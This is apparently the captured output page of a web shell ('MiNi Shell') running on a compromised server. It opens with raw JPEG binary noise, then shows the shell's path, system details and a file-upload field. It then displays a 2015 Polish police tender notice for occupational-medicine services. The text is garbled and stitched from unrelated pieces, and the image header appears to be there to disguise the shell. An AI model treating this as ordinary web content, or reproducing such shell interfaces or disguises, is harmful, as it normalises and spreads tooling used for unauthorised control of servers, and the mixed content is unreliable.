JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151123/316040-N-2015.html

<p class="kh_header"><b>Białystok: USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY</b><br>
<b>Numer ogłoszenia: 316040 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Białymstoku , ul. Sienkiewicza 65, 15-003 Białystok, woj. podlaskie, tel. 85 670 31 37, faks 85 670 28 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podlaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia jest udzielanie odpłatnie świadczeń zdrowotnych z zakresu medycyny pracy policjantom i pracownikom Policji polegających na:
a)	wykonywaniu badań profilaktycznych i kontrolnych funkcjonariuszy Policji,
b)	wykonywaniu badań wstępnych, okresowych i kontrolnych pracowników cywilnych Policji,
c)	wykonywaniu badań kierowców pod kątem zdolności do prowadzenia pojazdów służbowych oraz uprzywilejowanych,
d)	wykonywaniu badań stermotorzystów pod kątem zdolności do prowadzenia pojazdów służbowych (dotyczy zadania nr 3, 4),
e)	wykonywaniu badań do celów sanitarno-epidemiologicznych (dotyczy zadania nr  2, 4, 5, 6), 
f)	konsultacjach lekarzy specjalistów,
g)	wykonywaniu badań laboratoryjnych,
h)	wydawaniu orzeczeń i innych zaświadczeń do celów przewidzianych w Kodeksie pracy i innych przepisach,
i)	udziale lekarza w pracach komisji związanej z bezpieczeństwem i higieną pracy,
j)	wydawaniu opinii dotyczącej stanu zdrowia osób zakwalifikowanych na turnus antystresowy.

Szczegółowy wykaz badań znajduje się w załącznikach nr 1A - 1G SIWZ.
2. Wymienione świadczenia powinny być wykonywane zgodnie z obowiązującymi w tym zakresie przepisami prawa, tj. m.in.: zgodnie z:
a)	decyzją nr 449 Komendanta Głównego Policji z dnia 24 września 2004 r. w sprawie profilaktycznej opieki zdrowotnej w Policji (Dz. Urz. KGP Nr 19 z późn. zm.), 
b)	ustawą o służbie medycyny pracy z dnia 27 czerwca 1997 r. (tekst jedn. Dz. U. z 2014 r. poz. 1184) i aktami wykonawczymi, 
c)	Kodeksem pracy (tekst jedn. Dz. U. z 2014 r. poz. 1502 z późn. zm.), 
d)	rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn. zm.), 
e)	ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tekst jedn. Dz. U. z 2012 r. poz. 1137 z późn. zm.),
f)	ustawą z dnia 06 września 2001 r. o transporcie drogowym (tekst jedn. Dz. U. z 2013 r. poz. 1414 z późn. zm.),
g)	rozporządzeniem Ministra Zdrowia z dnia 5 listopada 2003 r. w sprawie warunków zdrowotnych wymaganych od osób wykonujących pracę na statkach żeglugi śródlądowej (Dz. U. z 2003 r.  Nr 199, poz. 1949),
h)	ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych oraz niektórych innych ustaw (tekst jedn. Dz .U. z 2011 r. Nr 127, poz. 721 z późn. zm.),
i)	rozporządzeniem Ministra Zdrowia z dnia 13 września 2011 r. w sprawie zadań służby medycyny pracy, których wykonywanie przez osoby niebędące lekarzami wymaga posiadania dodatkowych kwalifikacji (Dz. U. z 2011 r. Nr 206, poz. 1223),
j)	ustawą z dnia 5 grudnia 2008 r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (Dz. U. z 2013 r. poz. 947 z późn. zm.),
k)	rozporządzeniem Ministra Zdrowia z dnia 08 lipca 2014 r. w sprawie badań psychologicznych  osób ubiegających się o uprawnienia do kierowania pojazdami, kierowców oraz osób wykonujących pracę na stanowisku kierowcy (Dz. U. z 2014 r. poz. 937),
l)	rozporządzeniem  Ministra Zdrowia z dnia 17 lipca 2014 r. w sprawie badań lekarskich osób ubiegających się o uprawnienia do kierowania pojazdami i kierowców (Dz. U. z 2014 r. poz. 949).

3	W trakcie realizacji przedmiotu zamówienia Wykonawca musi zapewnić:
a)	gabinety w ilości odpowiedniej do liczby lekarzy wykonujących przedmiot zamówienia;
b)	gabinet zabiegowy, w którym będzie pobierany materiał do badań laboratoryjnych;
c)	urządzenie EKG;
d)	pracownię RTG;
e)	pracę obiektu i wykonanie w nim usług w dni robocze od poniedziałku do piątku;   
f)	świadczenia nieujęte w formularzu ofertowym wykonywane wg obowiązujących stawek w cenniku Wykonawcy mogą być realizowane poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

4 Wykonawca zobowiązany będzie do:
a)	utworzenia ewidencji zgłoszeń na badania, prowadzenia jej w trakcie realizacji umowy oraz do jej aktualizacji; 
b)	prowadzenia dokumentacji medycznej, chronienia jej i udostępniania zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 29 lipca 2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów (Dz. U. z 2010 r. Nr 149, poz. 11580);
c)	prowadzenia ewidencji wykonanych świadczeń zdrowotnych za każdy miesiąc, z uwzględnieniem rodzaju i ilości poszczególnych usług zrealizowanych dla każdego uprawnionego do świadczeń;
d)	zapewnienia udziału lekarza w pracach komisji związanej z bezpieczeństwem i higieną pracy;
e)	przestrzegania tajemnicy w zakresie dokumentacji medycznej i danych osobowych osób badanych;
f)	poddania się kontroli, w szczególności dotyczącej zakresu i sposobu udzielania świadczeń, oraz dotyczących rozliczeń za świadczone usługi, zgodnie z przepisami obowiązującymi w tym zakresie;
g)	zapewnienia personelu uprawnionego do przeprowadzania badań, lekarzy specjalistów oraz personelu pomocniczego (pielęgniarki). Osoby wykonujące zadania z zakresu medycyny pracy muszą spełniać wymagania określone w: Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych 
w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn. zm.).

5.	Zamawiający dopuszcza składanie ofert częściowych - ilość zadań 7.

Zadanie nr 1 - świadczenie usług medycznych z zakresu medycyny pracy pracownikom               
i funkcjonariuszom KPP w Bielsku Podlaskim. 
Wymienione świadczenia powinny być wykonywane w obiekcie (lub obiektach) położonym           w granicach administracyjnych miasta, którego zadanie dotyczy lub w miejscowości oddalonej nie dalej niż 50 km od miejscowości, której zadanie dotyczy. Dopuszcza się, aby pracownia badań psychotechnicznych kierowców oraz pracownia, w której wykonywane są badania na widzenie zmierzchowe i wrażliwość na olśnienie znajdowały się poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

Zadanie nr 2 - świadczenie usług medycznych z zakresu medycyny pracy pracownikom               
i funkcjonariuszom KPP w Kolnie.
Wymienione świadczenia powinny być wykonywane w obiekcie (lub obiektach) położonym w granicach administracyjnych miasta, którego zadanie dotyczy lub w miejscowości oddalonej nie dalej niż 50 km od miejscowości, której zadanie dotyczy. Dopuszcza się, aby pracownia badań psychotechnicznych kierowców oraz pracownia, w której wykonywane są badania na widzenie zmierzchowe i wrażliwość na olśnienie znajdowały się poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

Zadanie nr 3 - świadczenie usług medycznych z zakresu medycyny pracy pracownikom               
 i funkcjonariuszom KPP w Mońkach.
Wymienione świadczenia powinny być wykonywane w obiekcie (lub obiektach) położonym             w granicach administracyjnych miasta, którego zadanie dotyczy lub w miejscowości oddalonej nie dalej niż 50 km od miejscowości, której zadanie dotyczy. Dopuszcza się, aby pracownia badań psychotechnicznych kierowców i stermotorzystów oraz pracownia, w której wykonywane są badania na widzenie zmierzchowe i wrażliwość na olśnienie znajdowały się poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

Zadanie nr 4 - świadczenie usług medycznych z zakresu medycyny pracy pracownikom              
i funkcjonariuszom KPP w Sejnach.
Wymienione świadczenia powinny być wykonywane w obiekcie (lub obiektach) położonym             w granicach administracyjnych miasta, którego zadanie dotyczy lub w miejscowości oddalonej nie dalej niż 50 km od miejscowości, której zadanie dotyczy. Dopuszcza się, aby pracownia badań psychotechnicznych kierowców i stermotorzystów oraz pracownia, w której wykonywane są badania na widzenie zmierzchowe i wrażliwość na olśnienie znajdowały się poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

Zadanie nr 5 - świadczenie usług medycznych z zakresu medycyny pracy pracownikom               
i funkcjonariuszom KPP w Siemiatyczach.
Wymienione świadczenia powinny być wykonywane w obiekcie (lub obiektach) położonym              w granicach administracyjnych miasta, którego zadanie dotyczy. Dopuszcza się, aby pracownia badań psychotechnicznych kierowców oraz pracownia, w której wykonywane są badania na widzenie zmierzchowe i wrażliwość na olśnienie znajdowały się poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

Zadanie nr 6 - świadczenie usług medycznych z zakresu medycyny pracy pracownikom              
i funkcjonariuszom KPP w Wysokiem Mazowieckiem.
Wymienione świadczenia powinny być wykonywane w obiekcie (lub obiektach) położonym             w granicach administracyjnych miasta, którego zadanie dotyczy lub w miejscowości oddalonej nie dalej niż 50 km od miejscowości, której zadanie dotyczy. Dopuszcza się, aby pracownia badań psychotechnicznych kierowców oraz pracownia, w której wykonywane są badania na widzenie zmierzchowe i wrażliwość na olśnienie znajdowały się poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

Zadanie nr 7 - świadczenie usług medycznych z zakresu medycyny pracy pracownikom               
i funkcjonariuszom KPP w Zambrowie. 
Wymienione świadczenia powinny być wykonywane w obiekcie (lub obiektach) położonym              w granicach administracyjnych miasta, którego zadanie dotyczy. Dopuszcza się, aby pracownia badań psychotechnicznych kierowców oraz pracownia, w której wykonywane są badania na widzenie zmierzchowe i wrażliwość na olśnienie znajdowały się poza granicami administracyjnymi miasta stanowiącymi siedzibę Wykonawcy.

Wykonawca składa ofertę na zadanie/a, które może zrealizować..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie posiadania szczególnych uprawnień do wykonywania określonej działalności lub czynności.
Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 SIWZ, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie posiadania wiedzy i doświadczenia.
Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 SIWZ, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie dysponowania potencjałem technicznym. 
Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 SIWZ, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie dysponowania osobami zdolnymi do wykonania zamówienia. 
Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 SIWZ, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie sytuacji ekonomicznej i finansowej.
Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 SIWZ, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie  realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. UWAGA! W celu zachowania formy pisemnej dokument ten powinien być własnoręcznie podpisany przez te podmioty trzecie i złożony w oryginale.
Zobowiązania podmiotów trzecich do udostępnienia zasobów, złożone w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę, nie spełniają wymogu formy pisemnej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w przypadku zmiany przepisów wskazanych w umowie oraz odrębnych przepisów dotyczących badań profilaktycznych funkcjonariuszy i pracowników Policji.

Dopuszcza się zmianę wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany: 
a)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 - 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2002 r. Nr 200, poz. 1679 ze zm.),
b)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;
pod warunkiem wykazania przez Wykonawcę, że zmiany te mają wpływ na koszty wykonania zamówienia wraz z pełnym uzasadnieniem i wskazaniem procentowego wzrostu tych cen. Jednocześnie Zamawiającemu będzie przysługiwać prawo żądania dalszych wyjaśnień wraz z przedstawieniem dokumentów celem stwierdzenia dopuszczalności zmiany cen.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.podlaska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Białymstoku, ul. Sienkiewicza 65, 15-003 Białystok, pokój nr 220 Zespół ds. Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2015 godzina 10:30, miejsce: Komenda Wojewódzka Policji w Białymstoku, ul. Sienkiewicza 65, 15-003 Białystok, pokój nr 220 Zespół ds. Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com